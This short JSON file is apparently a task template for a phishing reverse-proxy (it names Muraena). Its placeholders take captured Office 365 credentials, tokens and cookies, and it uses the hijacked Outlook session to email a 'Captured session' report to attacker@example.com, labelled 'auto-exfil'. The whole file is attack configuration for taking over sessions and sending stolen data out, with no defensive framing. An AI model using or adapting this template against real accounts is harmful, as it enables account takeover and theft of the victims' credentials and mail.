{
  "name": "%%%TRACKER%%%",
  "task": {
    "type": "office365",
    "name": ["OutlookWriteEmail"],
    "params": {
      "fixSession": "https://outlook.office.com/mail/inbox",
      "credentials": %%%CREDENTIALS%%%,
      "tokens": %%%TOKENS%%%,
      "writeEmail": {
        "to": "attacker@example.com",
        "subject": "Captured session - %%%TRACKER%%%",
        "data": "Muraena auto-exfil"
      }
    }
  },
  "cookies": %%%COOKIES%%%
}
